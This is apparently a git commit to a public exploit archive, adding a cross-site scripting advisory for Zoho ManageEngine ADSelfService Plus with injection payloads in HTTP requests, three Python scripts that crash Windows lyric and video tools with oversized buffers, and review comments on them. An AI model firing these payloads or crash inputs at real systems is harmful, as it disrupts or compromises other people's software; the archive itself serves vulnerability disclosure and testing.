From 61e7eefac4177edca8a5a1121f9126375c2cc043 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 10 May 2019 05:02:01 +0000
Subject: [PATCH] DB: 2019-05-10
4 changes to exploits/shellcodes
Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)
Lyric Maker 2.0.1.0 - Denial of Service (PoC)
Convert Video jetAudio 8.1.7 - Denial of Service (PoC)
Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting
---
 exploits/php/webapps/46815.txt | 50 ++++++++++++++++++++++++++++++++++
 exploits/windows/dos/46816.py | 19 +++++++++++++
 exploits/windows/dos/46817.py | 22 +++++++++++++++
 exploits/windows/dos/46818.py | 22 +++++++++++++++
 files_exploits.csv | 4 +++
 5 files changed, 117 insertions(+)
 create mode 100644 exploits/php/webapps/46815.txt
 create mode 100755 exploits/windows/dos/46816.py
 create mode 100755 exploits/windows/dos/46817.py
 create mode 100755 exploits/windows/dos/46818.py
diff --git a/exploits/php/webapps/46815.txt b/exploits/php/webapps/46815.txt
new file mode 100644
index 000000000..364383dd4
--- /dev/null
+++ b/exploits/php/webapps/46815.txt
@@ -0,0 +1,50 @@
+[+] Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Multiple Cross-Site Scripting
+[+] Author: Ibrahim Raafat
+[+] Twitter: https://twitter.com/RaafatSEC
+[+] Download: https://www.manageengine.com/products/self-service-password/download-free.html?
+
+
+[+] TimeLine
+ [-] Nov 23, 2018 Reported
+ [-] Nov 26, 2018 Triaged
+ [-] Dec 27, 2018 Fixed
+ [-] May 08, 2019 Public Disclosure
+
+[+] Description:
+ Zoho ManageEngine ADSelfService Plus 5.7 before build 5702 has Multiple XSS vulnerabilites
+
+[+] POC
+
+[-] Employee search form
+
+POST /EmployeeSearch.cc?actionId=Search HTTP/1.1
+
+searchString=dddddffff");a=alert,a(31337)//&&searchType=contains&searchBy=ALL_FIELDS333');a=alert,a(31337)//&adscsrf=
+searchType parameter:
+searchString=a&searchType=containss9ek";a=alert,a(31337)//&searchBy=ALL_FIELDS&adscsrf=
+
+
+2- Employee Search – ascending parameter
+
+/EmployeeSearch.cc?actionId=showList&searchBy=ALL_FIELDS&searchType=contains&PAGE_NUMBER=37&FROM_INDEX=22&TO_INDEX=22&RANGE=100&navigate=true&navigationType=&START_INDEX=22 HTTP/1.1
+
+selOUs=&genID=12191&ACTIVE_TAB=user&sortIndex=0&ascending=true’;a=alert,a(31337)//&&searchString=a&TOTAL_RECORDS=22&adscsrf=
+
+
+3- EmpSearch.cc - searchString parameter
+
+POST /EmpSearch.cc?operation=getSearchResult&REQUEST_TYPE=JSON&searchString=RR&searchType=contains&searchBy=ALL_FIELDS&actionId=Search HTTP/1.1
+
+&adscsrf=
+
+4- Stored XSS in self-update layout implementation.
+
+/SelfService.do?methodToCall=selfService&selectedTab=UpdateFields
+Insert the following payload into Mobile Number field, and save
+Payload: 11111111]";a=alert,a(31337)//
+Code execute here:
+/Enrollment.do?selectedTab=Enrollment
+
+
+[+] Assigned CVE: CVE-2018-20484,CVE-2018-20485
+[+] Release Notes: https://www.manageengine.com/products/self-service-password/release-notes.html
\ No newline at end of file
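Review bot: Every request in the PoC ends with an empty `adscsrf=` field and the advisory never says whether the server validates that token; if it is enforced, the reflected cases (items 1–3) can only be triggered by a victim who already holds a valid token, which materially changes the impact compared with a link-based XSS, so a sentence stating whether the token check was bypassed or absent belongs under Description. Item 3 (EmpSearch.cc) lists request parameters but no injected value, so it cannot be reproduced from this text; quoting the payload the way items 1, 2 and 4 do would make that section self-contained. The `ascending=true’;a=alert,a(31337)//` payload in item 2 uses a typographic apostrophe (U+2019) where the other payloads use `'` or `"`, which looks like an artefact from the editor the advisory was written in and would not terminate a `'`-quoted JavaScript string as written; confirm against the original finding. 'vulnerabilites' in the Description line should read 'vulnerabilities'.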
diff --git a/exploits/windows/dos/46816.py b/exploits/windows/dos/46816.py
new file mode 100755
index 000000000..3c65f41f0
--- /dev/null
+++ b/exploits/windows/dos/46816.py
@@ -0,0 +1,19 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)
+# Date: 08/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://lyricvideocreator.com/
+# Software Link: https://lyricvideocreator.com/dwl/LyricVideoCreator.exe
+# Version: 2.1
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "LyricVideo.py", it will create a new file "sample.mp3"
+# 2.- Open LyricVideoCreator.exe
+# 4.- Click on the 'Browse song' button, select the 'sample.mp3' file created and click on the 'Open' button
+# 5.- Crashed
+
+buffer = "\x41" * 5000
+f = open ("sample.mp3", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46817.py b/exploits/windows/dos/46817.py
new file mode 100755
index 000000000..b01884ca4
--- /dev/null
+++ b/exploits/windows/dos/46817.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Lyric Maker 2.0.1.0 - Denial of Service (PoC)
+# Date: 08/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.jetaudio.com/
+# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe
+# Version: 2.0.1.0
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "LyricMaker.py", it will create a new file "LyricMaker.txt"
+# 2.- Copy the text from the generated LyricMaker.txt file to clipboard
+# 3.- Open JetLyric.exe or Lyric Maker
+# 4.- Paste clipboard in in the field "Title"
+# 5.- Go to file -> Save Lyric...
+# 6.- Save the file with any name, e.g 'sample.jlr'
+# 7.- Crashed
+
+buffer = "\x41" * 5000
+f = open ("LyricMaker.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
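Review bot: The reproduction steps in the 46816.py header jump from `# 2.-` straight to `# 4.-`, so a reader will look for a missing step 3; renumber them to `# 3.- Click on the 'Browse song' button, ...` and `# 4.- Crashed`. The payload file is opened with a bare `open("sample.mp3", "w")` and closed by hand; `with open("sample.mp3", "wb") as f: f.write(b"\x41" * 5000)` closes it on every path and writes raw bytes, which starts to matter the moment the pattern is replaced by a cyclic pattern or non-ASCII bytes, since text mode on Python 3 would re-encode those. The PoC records only 'Crashed'; a one-line comment giving the exception type and faulting module (from WinDbg or the Windows Error Reporting entry) would let readers distinguish a plain DoS from an overwrite that is worth investigating further.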
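Review bot: In 46817.py the header line `# Software Link http://www.jetaudio.com/...` is missing the colon that every other field in the same header carries (`# Vendor Homepage:`, `# Version:`, `# Tested on:`); it should read `# Software Link: http://www.jetaudio.com/...` so the header stays uniformly parseable. The title names 'Lyric Maker 2.0.1.0' while the vendor homepage, download link and step 3 (`JetLyric.exe`) all point at jetAudio; naming the product the way the sibling 46818.py does ('... jetAudio 8.1.7') would let readers searching the index by the installed package find it. Step 4 reads 'Paste clipboard in in the field', a doubled word. Since the buffer only reaches the program through an interactive paste into the Title field (steps 2–4), this is a local, user-assisted denial of service with no file- or network-based trigger, and saying so next to the title would stop readers from assuming a crafted `.jlr` file reproduces it.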
diff --git a/exploits/windows/dos/46818.py b/exploits/windows/dos/46818.py
new file mode 100755
index 000000000..1c163b3ed
--- /dev/null
+++ b/exploits/windows/dos/46818.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Convert Video jetAudio 8.1.7 - Denial of Service (PoC)
+# Date: 08/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.jetaudio.com/
+# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe
+# Version: 8.1.7
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "ConvertVideo.py", it will create a new file "ConvertVideo.txt"
+# 2.- Copy the text from the generated ConvertVideo.txt file to clipboard
+# 3.- Open JetVidCnv.exe or Video Converter
+# 4.- Click on the 'Add Files...' button and select a video file
+# 5.- Paste clipboard in in the field "File Naming"
+# 6.- Click on the 'Preview' button
+# 7.- Crashed
+
+buffer = "\x41" * 512
+f = open ("ConvertVideo.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 25a2fabd3..5ef1b02b1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
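Review bot: The buffer in 46818.py is 512 bytes where the two sibling PoCs from the same commit use 5000, and nothing says whether 512 is the smallest length that crashes the 'File Naming' preview or simply the first value tried; a comment next to `buffer = "\x41" * 512` recording which it is (for example `# 512 bytes crashed the File Naming preview in testing; minimum length not determined`, adjusted to what was actually observed) would stop readers reading significance into the number. The header line `# Software Link http://www.jetaudio.com/...` lacks the colon used by `# Vendor Homepage:` and the other fields, and step 5 contains the doubled word 'in in'. Because the buffer is delivered by an interactive clipboard paste (steps 2 and 5) after the user has added a video file (step 4), the issue is a local DoS that needs user interaction, which is worth stating beside the title. `f = open ("ConvertVideo.txt", "w")` with a manual `f.close()` would read better as `with open("ConvertVideo.txt", "w") as f:`, which also closes the file if the write raises.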
@@ -6411,6 +6411,9 @@ id,file,description,date,author,type,platform,port
 46803,exploits/ios/dos/46803.c,"iOS 12.1.3 - 'cfprefsd' Memory Corruption",2019-05-06,ZecOps,dos,ios,
 46806,exploits/windows/dos/46806.py,"Easy Chat Server 3.1 - 'message' Denial of Service (PoC)",2019-05-07,"Miguel Mendez Z",dos,windows,
 46810,exploits/windows/dos/46810.py,"jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC)",2019-05-08,"Victor Mondragón",dos,windows,
+46816,exploits/windows/dos/46816.py,"Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows,
+46817,exploits/windows/dos/46817.py,"Lyric Maker 2.0.1.0 - Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows,
+46818,exploits/windows/dos/46818.py,"Convert Video jetAudio 8.1.7 - Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41241,3 +41244,4 @@ id,file,description,date,author,type,platform,port
 46799,exploits/asp/webapps/46799.txt,"microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection",2019-05-06,"felipe andrian",webapps,asp,80
 46804,exploits/multiple/webapps/46804.txt,"Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting",2019-05-07,alt3kx,webapps,multiple,80
 46811,exploits/linux/webapps/46811.txt,"NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass",2019-05-08,MobileNetworkSecurity,webapps,linux,
+46815,exploits/php/webapps/46815.txt,"Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting",2019-05-09,"Ibrahim Raafat",webapps,php,